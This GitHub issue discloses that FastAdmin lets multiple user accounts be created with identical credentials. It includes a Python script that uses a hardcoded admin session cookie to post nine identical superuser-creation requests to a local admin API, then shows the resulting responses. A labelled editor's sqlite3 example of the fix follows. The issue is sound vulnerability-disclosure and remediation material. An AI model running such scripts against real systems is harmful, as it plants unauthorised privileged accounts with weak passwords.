Duplicate User Accounts: Lack of Validation Allows Multiple Accounts with Same Credentials #93

Open
MatiasTilleriasLey opened this issue Jan 8, 2025 · 1 comment

@MatiasTilleriasLey

Duplicate User Accounts: Lack of Validation Allows Multiple Accounts with Same Credentials

Problem

In the FastAdmin platform, it is possible to create multiple user accounts using the same username and password combination. The system does not enforce uniqueness constraints on user credentials during account creation, allowing duplicate entries.


Impact

  • Security Risks: Duplicate accounts can lead to confusion during audits and make it harder to trace user actions.
  • Data Integrity Issues: Multiple accounts with identical credentials can lead to inconsistencies in the database and unexpected behavior in the application.
  • Abuse Potential: An attacker could exploit this flaw to flood the database with duplicate accounts, potentially causing denial-of-service scenarios.

Steps to Reproduce

  1. Go to the user registration page.
  2. Create an account using a specific username and password (e.g., user1 / password123).
  3. Log out and repeat the registration process using the same username and password.
  4. Observe that the system allows the creation of multiple accounts with identical credentials.

Exploit Code

```python
import requests

# Session cookie of an already logged-in admin on the reporter's local instance.
cookies = {
    'admin_session_id': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJzZXNzaW9uX2V4cGlyZWRfYXQiOiIyMDI1LTAxLTEwVDA5OjM4OjQwLjA5OTA4NSswMDowMCJ9.8Ma2KRDiFXlIFC2Nrtx2fZb4LcrK1IQvBz6myfYtdrQ',
}

headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0',
    'Accept': 'application/json, text/plain, */*',
    'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
    'Referer': 'http://127.0.0.1:8090/admin/',
    'Content-Type': 'application/json',
    'Origin': 'http://127.0.0.1:8090',
    'Connection': 'keep-alive',
    'Sec-Fetch-Dest': 'empty',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Site': 'same-origin',
    'Priority': 'u=0',
    'Pragma': 'no-cache',
    'Cache-Control': 'no-cache',
}

# The same username/password pair is sent on every request.
json_data = {
    'username': 'test',
    'password': 'test',
    'is_superuser': True
}

# Nine identical create requests; with no uniqueness check each one succeeds
# and the response carries a new user id.
for i in range(1,10):
    response = requests.post('http://127.0.0.1:8090/admin/api/add/User', cookies=cookies, headers=headers, json=json_data)

    print(response.text)
```

Execution Results

The following responses were obtained when running the exploit script, demonstrating the creation of multiple accounts with identical credentials:

```text
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":14,"created_at":"2025-01-08T18:04:15.144822","updated_at":"2025-01-08T18:04:15.144824","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":15,"created_at":"2025-01-08T18:04:15.149735","updated_at":"2025-01-08T18:04:15.149736","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":16,"created_at":"2025-01-08T18:04:15.154441","updated_at":"2025-01-08T18:04:15.154442","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":17,"created_at":"2025-01-08T18:04:15.159641","updated_at":"2025-01-08T18:04:15.159642","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":18,"created_at":"2025-01-08T18:04:15.164448","updated_at":"2025-01-08T18:04:15.164449","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":19,"created_at":"2025-01-08T18:04:15.169124","updated_at":"2025-01-08T18:04:15.169125","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":20,"created_at":"2025-01-08T18:04:15.173827","updated_at":"2025-01-08T18:04:15.173828","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":21,"created_at":"2025-01-08T18:04:15.178429","updated_at":"2025-01-08T18:04:15.178431","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":22,"created_at":"2025-01-08T18:04:15.183273","updated_at":"2025-01-08T18:04:15.183274","__str__":"test"}
```

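As an added illustration of the missing check (editor's example, not code from the FastAdmin project or from the reporter), the stand-alone Python/sqlite3 model below contrasts a User table with no uniqueness constraint, which accepts repeated inserts exactly like the run above, with a fixed path that rejects the duplicate both in the application and through a database UNIQUE constraint, and adds an audit query that lists usernames already duplicated in an existing table. The table name, columns and sqlite3 backend are assumptions, not FastAdmin's real schema.

```python
import sqlite3

# Constructed stand-in for a User table (NOT FastAdmin's real schema). As in the
# report, nothing here stops a second row with the same username.
VULNERABLE_SCHEMA = """CREATE TABLE "user" (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    username TEXT NOT NULL,
    password TEXT NOT NULL,   -- real code stores a password hash, never the plaintext
    is_superuser INTEGER NOT NULL DEFAULT 0)"""

# Hardened variant: the UNIQUE constraint makes the database itself reject duplicates.
HARDENED_SCHEMA = VULNERABLE_SCHEMA.replace("username TEXT NOT NULL", "username TEXT NOT NULL UNIQUE")


class DuplicateUsername(ValueError):
    """Raised when an account with this username already exists."""


def open_db(schema: str) -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(schema)
    return conn


def insert_user_unchecked(conn, username, password, is_superuser=False) -> int:
    """Mirrors the reported add endpoint: insert with no uniqueness check at all."""
    cur = conn.execute('INSERT INTO "user" (username, password, is_superuser) VALUES (?, ?, ?)',
                       (username, password, int(is_superuser)))
    return cur.lastrowid


def add_user(conn, username, password, is_superuser=False) -> int:
    """Fixed path: an explicit pre-check gives a clear error, and the UNIQUE
    constraint is the backstop that closes the race between check and insert."""
    if conn.execute('SELECT 1 FROM "user" WHERE username = ?', (username,)).fetchone():
        raise DuplicateUsername(username)
    try:
        return insert_user_unchecked(conn, username, password, is_superuser)
    except sqlite3.IntegrityError as exc:
        raise DuplicateUsername(username) from exc


def find_duplicate_usernames(conn) -> dict:
    """Audit query for an existing table: {username: [ids]} for every username
    that occurs more than once, so the extra accounts can be merged or disabled."""
    rows = conn.execute('SELECT username, GROUP_CONCAT(id) FROM "user" '
                        'GROUP BY username HAVING COUNT(*) > 1').fetchall()
    return {name: sorted(int(i) for i in ids.split(",")) for name, ids in rows}
```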

@MatiasTilleriasLey
Author

Note: For your information, the tests were conducted using the example project provided in the repository fastapi_sqlalchemy.
